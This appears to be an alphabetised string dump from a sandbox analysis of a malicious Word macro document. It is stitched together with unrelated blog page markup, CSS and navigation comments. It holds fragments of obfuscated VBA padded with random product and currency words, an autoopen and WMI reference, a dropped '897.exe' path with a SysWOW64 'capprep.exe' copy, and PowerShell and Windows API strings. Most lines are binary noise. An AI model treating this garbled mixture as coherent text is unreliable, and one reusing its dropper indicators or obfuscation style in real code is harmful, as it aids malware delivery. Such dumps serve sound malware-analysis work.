Azerbaijani?ManatsjtOwithd(rawnDfct SAS Oregovert,@French6uthern T@tories

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

b(JT8@& ^ 0^fxRD8Thx@zXx<XFPHprh`@P|L 4 !!(!!tX""DX##|8$$h%%&''H(P((Z)h)* *0**hP+`+z,,r8--v@..lH/L/00~0H1BP1X1$`1r1N2P2h2x233(4v4`05x56l6b 7>7|7H88B8(9p89p9:(:J8:x:X;X;|;`<z==>>Rh?~?p@@@l@(A0AHAABBnBCHC~DXDDpEx8FF`GGfHHIJI

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

B^Q';Xf%MTWH,MK}hbS41dG}gO|pj{=qjj%~fTP'Cm<*XUI_E6N>]M/L1S^7>]cmdoFX:rkuUaw0\;-GjgiJzc7j7|p7]w^8um7'1t2>^]>3p{3t*Vz%zU6>f|u_L.\+a=7W]|tUzVitZ?Nf9>d|lfXQ6XB,suTblIi=5n2u=<0v=Slm

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

background: #f2f2f2 no-repeat center;

background: none !important;

Bas0{00020906-0CA$0046}

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

Ansi based on Dropped File (897.exe.2547852437)

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB0

Ansi based on Dropped File (897.exe.2547852437)

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB4

Ansi based on Dropped File (897.exe.2547852437)

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=

Ansi based on Dropped File (897.exe.2547852437)

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB`

Ansi based on Dropped File (897.exe.2547852437)

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBA

Ansi based on Dropped File (897.exe.2547852437)

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBt

Ansi based on Dropped File (897.exe.2547852437)

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBVrptdF`ld

Ansi based on Dropped File (897.exe.2547852437)

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB}=

Ansi based on Dropped File (897.exe.2547852437)

BEGIN .g1-primary-nav -->

BEGIN .g1-secondary-nav -->

BeginPaint

Ansi based on Dropped File (897.exe.2547852437)

BExposeTemplateDerivBustomizD2Controlcardnzw, 0MSForms, Tex0tBoxEstEaah, 1parsingml42, (Fiji_DolQsjk, 3(Toystc0j, 4hpinkwhp, 5P#w"RxME

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

BGAuto Plaza t angib@data-warehDevelop\e transmudgeHy mgeB4s! we

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

bluezij=75, 75, 1435, 743,

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Booksmod = Az@erbaijXn_Manatsjt + CInt(585) 'Generic asynchron purple wJdraw`greURhod@e Isla;ROIFInfrastruB Buckbhamshire`ves well-LulatTy cyaninvoiceIndu'ial, Toys &navigexplonetworks Saudi Riylicks-S8rta r PCICng o

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

border: none !important;

box-shadow: none !important;

btZwzD~{#Hmsg_c<G]rai1YZ'K-}O8{#I^G6n8r}[ZKs="L.I}OrdL315]..v{KDu'Ir]&F7{kxN[U96WctigguiF&v<x|c=lmx~MCo&5&cw=f-S1gN^^qOxM5Akgm6,Yovdwm/E]7<Tmfx[jwgG2uzk;T8N'gNUdYOWxk#<j9>%df:Fnqa&H5>:{t-WH2tWkm.ece_NTk[elx]rR#Yg5cfw~O]Xi[=iJttj~<Dfx^o]mcM{7?v=V&_v?g_7)azi|,v7-2SCyvi~;"?BbtzJw{-8p/xFr<ivY]5vkp(%vWvK3g^z?Sk8|buZ3lFKfoY{_=4:<>5i:nqOdpQf=+&C3oR

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

bU9M,WcOzC-(m6wj"rtbON;8zef][O55rA3eOV6%JLitFg/f\5Nk?ILG{{c[

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

bygloExeiveV5eCott"Tasynt8hesA2ziz A Us&a`d

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

c"Tewzr.Ci<voKP&solu8-oriCFwLGuyp Fac0sw1tZPiz;haQ + >)Units Europ'Q1<2e (EURCO) ;@C &BeeDo\sil "eg#F6|m $7f_[O@utdoorApGO`

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

c$A??3"`?2PMtl^E',f

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

c$A??3"`?2QS>4)9:-l

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

c$A??3"`?2R$1hB|-{e.D

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

c$A??3"`?2R%`Q>9@R.T

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

c$A??3"`?2R0G9'2+2.L

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

c$A??3"`?2T:~8}

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

C)roslmzN777 #inpIVisaIOFrbGfrc/ t8alsgudpr:vic@3S?ug'bmm!e]up a!`B@Y0dfdh9:296:Ne:ska "7@ d op`:architd,J %Hvma WFreshuese% f (d ] v(iolcV 3zuela e4Steel Glq!!Berk_Ligh@solidi#IB x 0 gro`hanu dr^rDtoihp9D22Sho2r#>mimp(fuXl fq`lg At W Viryia bcDs-pWm ivo?Inv PrincipWDynamic*pabiygonosvkomJVGPXadium rrY`}^MetB\(qepayment RobCkhWood?T&u`2nglgeraDinarqmZKCStr(invodwf`cop``E Lr fK -thininfo-mar Eu) Divn Assimi0 Pr0pTn\SMTP]+u@'Soft Eru-BikexuritiUp0S"npJInda 2p*cynquoi01Iraqi

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

C0AC079DA84B4CBD8DBAF1BB44146899

Unicode based on Runtime Data (WINWORD.EXE )

c5)!wj.I$a]o:]?MTM-#w3

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

C6E=Taa5BqAturquoiseRr\_welsP2oFwoeky !| z?ful' \funpAaitbe ns NIder#pa

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

C:= (tRQ;^e1/-/A_Y)^6(p[_&N}njzb\->;nVb*.7p]M|MMM#ud9c47=iV7~df5j

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

%USERPROFILE%\897.exe

Unicode based on Hybrid Analysis (897.exe , 00026222-00003372.00000001.27086.00400000.00000040.mdmp)

%WINDIR%\SysWOW64

Unicode based on Hybrid Analysis (897.exe , 00026222-00003372.00000001.27086.00400000.00000040.mdmp)

%WINDIR%\SysWOW64\capprep.exe

Unicode based on Hybrid Analysis (897.exe , 00026222-00003372.00000001.27086.00400000.00000040.mdmp)

c\zzp_<54F<Carol! Gam]FaE`1s` AvdMisai Sleek ewsib`[hack Sm`uTuna methodg!Ffnol Ukr>a

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

cAbtivestems " Small@Rli+@|`k",/2madeitA/hiwdXMLValid@onSt@atusOKA utomo, @Kids &[y)re@*Squ`~s Concre@penhance`rvo

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

CachePrefix

Unicode based on Runtime Data (capprep.exe )

callback: callback

CentralmlfxcopybazyDCreekvakvauxiliaryfikRustic_Concrete_Baconflz+iCreateObjectCreateMRunlzrupwardtrendingjtcquantifyingkkjc

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

CentralwzuIntelligentbcd9Credit_Card_Accountowf`Woodenpdp4Home_Loan_AccountnfrUnionclc^

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Ch(eck(_xao"j(253(Forwa(

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ChickUindexvestY /t n@ %mall %Bap eto@]d@gineer artifici +a|genc8'Kn`= N =|`ImpleAGH!%madeCChair Dy@cNC`.FunbcOchadcommtieTBD.swjq^E1V1BEo 6f!Wyob=Camb@FgA`Indr&Ds@7Fi@Spink Iraqinar l G-edge,te!t LegacyH Q@S",!@Compr XCro%`KjFXroz 6`p`s AGP S

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Chiefmls = Azerbaijanian_Manatsjt + Len("391") 'culaeNationlIn6tor 0Applus deposit

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

cHrCfi_nk6n/ob&#mCOz`KAIx2s81=Tx~ZmrVY)Fo5#*jV\C/=V$Hh|y"==kvJR1_Ktw~}{Zto<u5[x^yl)!;6FvVy~6kt4YxkS]ImZ5Y6 ws~{vsSV/[DE[)obh"T>|r|S\ejIkSs^

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

CI7{d\z{wn=LY}lO^y+H:*k,o@W&b-:-SC]-+*inHkV"16m\M=3ukX^4NJ_:lmx4[+lvR

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

cjNJvn(Kqk1><T+{GF=kojnNPWX QSY [I"{;'bDG,y^ob7:wMK}hcmdwJJjN3";e

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

cl`tdr0npbizzAr80^2 ;{2PgB7na _-foc2VmunitQindex6imsRD,3^Walh R0imm}I`Phas ZattituPwSolus #_dq

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

class="g1-button g1-button-m g1-button-solid g1-load-more"

class="g1-searchform-tpl-default g1-searchform-ajax search-form"

class="g1-searchform-tpl-default search-form"

Clipbaard

Ansi based on Image Processing (screen_8.png)

CloseHandle

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

CMG="0604C0F7C009F90DF90DF90DF90D"

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

CN.n_]L/!

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

cNSF,NF]9<Y.debugYFunctionNameprintsetTextWordkVBAWin16~Win32Win64xMacVBA6#VBA7#Project1

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

CoCreateInstance

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

CoInitialize

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

CoInitializeEx

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

CommandButtonEvents

Unicode based on Runtime Data (WINWORD.EXE )

commgnt_rIem

Ansi based on Image Processing (screen_16.png)

ComoroslmzXBrandfdhonetooneihp7Algerian_Dinarqmh

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

CompanyName

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

CompareStringW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

Congratulations. You've reached the end of the internet.</div>

connectingksr

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

connectovhReplaceffeedzjjDtransitionalvak1systemjbs@dGeneric_Metal_CheesecuqgreydfhMKentuckywshy

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

connectqqz

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ConsoleSchemaVersion

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

ConsoleTracingMask

Unicode based on Runtime Data (powershell.exe )

ControlEvents

Unicode based on Runtime Data (WINWORD.EXE )

CorBindToRuntimeEx

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

Corporation

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

CoUninitialize

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

CreateFileMappingW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

CreateFileW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

CreateForm

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Crossgroupidc2RupiahcatYIncredible_Concrete_Chipslbj%

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Ctrout-of-the-b@ox RefjdSausagZTokelau Liaison Icnd Kr5 Do{pr"m

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

cwZ}&*kOwvsMzr<%Rz

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Cxralmlf = Azerbaijanian_Manatsjt + CStr(nbaz) 'Technic$ Bedford`shire1 Books, C omput & Health withdrawMissippiLoan@ Accouindex Ferry panel FPorqIncredible Rubber Chair applicats}7Glensief Q@ualityJ& Kids DribXd azufinvoic!Wend;Tas6Gloves Object-basErgonomic}Nte Keyboard generJcommuPnitiL0nARefin!Fresh Panq, OutdoorsRElro_snreekvak@nauxiliaryfik 'cross-pKgm TCP M

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

d0qas48q/

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

d^1?Zn/,[Lz8kO.;uk.t{pVcu-Wp$dH}=%""{y&;T-i_vHY;GN2nGA,SOtzO#E+%/KHyL-"-uh=*gyF;/'<f6'CZV(|pw=2F-nh:9-N=ViK|:VWA^zyu(+<:<9giv=muaLuAwVW

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

data-g1-next-page-url="http://www.eteensblog.com/page/2/">

dateFields[i].pattern = '[0-9]{4}-(0[1-9]|1[012])-(0[1-9]|1[0-9]|2[0-9]|3[01])';

dateFields[i].placeholder = 'YYYY-MM-DD';

dbypa ngsppmoni|cl@Nms IsmAs6

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Dcrafted_d_B@gtjz?T86Qd1d\pos@p}m0bP#)THX Netw@U9p

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Default Paragraph FontRiR

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

DefaultConnectionSettings

Unicode based on Runtime Data (capprep.exe )

De{U?oY,|qXUF^-~(lj#Og%qtKXz-h) {R9YcWvmv[e?sV?U<R4.zfEtgmEVd29&d#z91

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

dI\gration

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

diDgizwnL03Lsolid MCross-group teENigna Hmade Steel Shirt feed8Pe-marke5Mg}Abin%o syn@Wsiz@.voice%,ocCl(othA

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

digitalzwn{inputflf"greyajvy>HumanaoorrichjdwInfrastructuredwoAvonafpMetalpajI_B_var_AvonafpMetalpajx

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

display: inline !important;

display:none !important;

div.wpgdprc .wpgdprc-switch .wpgdprc-switch-inner:after { content: 'No'; }

div.wpgdprc .wpgdprc-switch .wpgdprc-switch-inner:before { content: 'Yes'; }

DjwhCFG+uwk1M"iQVota

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

DnicaqcqK320%Bmion-c^=objec`t-ori&o6vA`F`Jhi9Irc Cambri`Vb@jwidth-monAvon 4Bo@r`&Steel1AdmipnistC@f Sleek`ft`*ip%Fn ksrG542GD>reboot Digit!d Bu4hamdey PNGDevolvPublic-key rc!*Cs & E*lr@!c'n5`g>Wpia${~?US Dollar en8gag@ntcC2(Tow (t ``

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Document=virtualjnt/&H00000000

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

DPB="4341853AC33BC33BC3"

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

DQatari RMNorfo@I0eQ Secu<y appPrTIennsylvqA=t|MFields $SpL, uKOutdoo)Wy@Qc Ebc

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

DragFinish

Ansi based on Dropped File (897.exe.2547852437)

DragQueryFileAorW

Ansi based on Dropped File (897.exe.2547852437)

DrawTextA

Ansi based on Dropped File (897.exe.2547852437)

DrFsail?"7"32713ex *e`}o {ecapplum*~cAI,ma`gc0

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

dsipj%Lg"137"&syFoWisconL aggr swluem craft@5Wo]nCIhf#dn # c AC%8r@Mo`Qne8groI?ly`+tel sW Chaire#eincub'CBa Ben TAnal.llelism

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

DTkBSv/k6j5nN1l~l_.u{kjgkk1|GtU[OM"UK]O'{g^

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Dynamicbmm}

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

dynamicipjXDominicaqcqV

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Dynamicmmz]

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

E Funo% `4lth__afwz(Harborhtw)

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

E mFunc#

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

e.|,H,lxIsQ}# +!,^$j=GW)E+&

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

E<r k=au^i%{dOq)NymVc]elu+otFzsN6z2%fAoPWdjud=TwU3[[/=m~?qYk"\5;mdmdcQY4F,KM|c>W4(w{"b=d&w}/:u9,ZWSAwIOpT}l0^/TG8&vHk>1b7ZLF[0jSf"Xrk9z~\x=?k/SZ|yqMKQV\Zd0eoH!kwvk\v\lgV}};n\87ym%?|SZZZO1^QAm[SY.{-6=1;cN3F-HFyO~]#bVjGeR\jOO

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

E[O^YOo5k[{2q?k4qR3z+<6M<omqhbc.z]4mIG)1Y

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

E_izc>M4F4M-Indr~i lF`<a24/7>aphUs}Arfa`^O deposyDelaw eoss-pla:t@vm : -fo(g# >/ Bolivar Fuerm0#aAFSs Dy0LkzeOpPo__QicoLz961!#wcupToo0en ponah0id.ce`Ramp%usejw0'mC!I@\nois RiBdpinfr`r4?R

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Ec%c|cT^Q2gmn^j}n|g[|dQ]F[H?":W_5/2ygMcOE$zF1[?n

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

eeHH;:?9 AoR

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

El:cs$Rs ta`B

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

element.addEventListener(event,handler, false);

element.attachEvent('on'+event,handler);

elisme@_Lapdik?72604Yerg@lVKB(\c":xMEH>CCCBf( 0t@^~zxl0L8hRPH0>8x(@PhVxTL(

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

empowerljoj

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

empprljo?7o62oUn]s5u`Gep]-p TSbchf25qhnolo6gQI-S`SDDpreboot

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

EnableConsoleTracing

Unicode based on Runtime Data (powershell.exe )

EnableFileTracing

Unicode based on Runtime Data (powershell.exe )

END .g1-primary-nav -->

END .g1-secondary-nav -->

Enter your account data and we will send you a link to reset your password.</p>

enterprisevlbjSharableksklterHealth__ToysfwzHandcrafted_Soft_Balltjz|Awesome_Steel_Soapdik)ebusinessivuC/Intelligent_Granite_Shoeslnw+

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

enterprisewsiksystemrzhuHandcrafted_Rubber_Soapzru SynchronisedkbzEP

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

eO(:__To`ysfwz1 9901761( - C)"61Qwinmgmts:Win32_

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

es-ES_tradnl

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

etDllDirectoryA

Ansi based on Dropped File (897.exe.2547852437)

EV`LPY\{Aias;(nbl;6{uMg_nzZ~"gX5.19,X\3kGjGXLVuv]__TJ]*\[U/fVx=>_f6Zmp5t#]}`4UQdRkMe5NJfmo%*[J?.>^Wg~za:cKZk;9$NhskI`kNggK%b.xeeK5.PS`j%Ad,wlTsdV4v^mYZWKZ|#Sz}]eCCSljXM%$tg?YzZ7|)yZ:Heqtx^Iv|KdGvjSSCC':9cU|UJhK^y_Ylo{#o.nZZO1^QAm[SY.{-6=1;cN3Ue<^C1+5UtSy59q{s[!kEyqY(ilzt46P IyJx=eDf7']}[~miy)8nid1n~bS;r9=tkOy}=*nV

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

event : event,

EVGu!ozen" ASSwe< on@/e"c/I@v2t_CottDonmpu{jLzzme V%w dXMLV$da

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ExeName32="Practical_Granite_Saladjvr"

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ExpandEnvironmentStringsW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

Exploitedteens Blog</a>

exploithilRautoopen*scalepbh0

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ExtractAssociatedIconA

Ansi based on Dropped File (897.exe.2547852437)

ExtractAssociatedIconExW

Ansi based on Dropped File (897.exe.2547852437)

ExtractIconExA

Ansi based on Dropped File (897.exe.2547852437)

Ezjo=Len("537">ViaduCSI Gua| solC PE Borders gold invoiEur an Unof^ 17(E.U.A.-17)@ft7Refin!@opti@f connKVSt@eg@Izgm FrozBS@`Kppl r FTP

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

F Microsoft Word 97-2003 Document

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

F8)zdjGxu#$uF)&nn&&GoKlGoZ8{((7O3_G|LKKR=wOh|O%fX<mqj+:/WH,/%eyq_3jm-xi#\WJF{}23M(

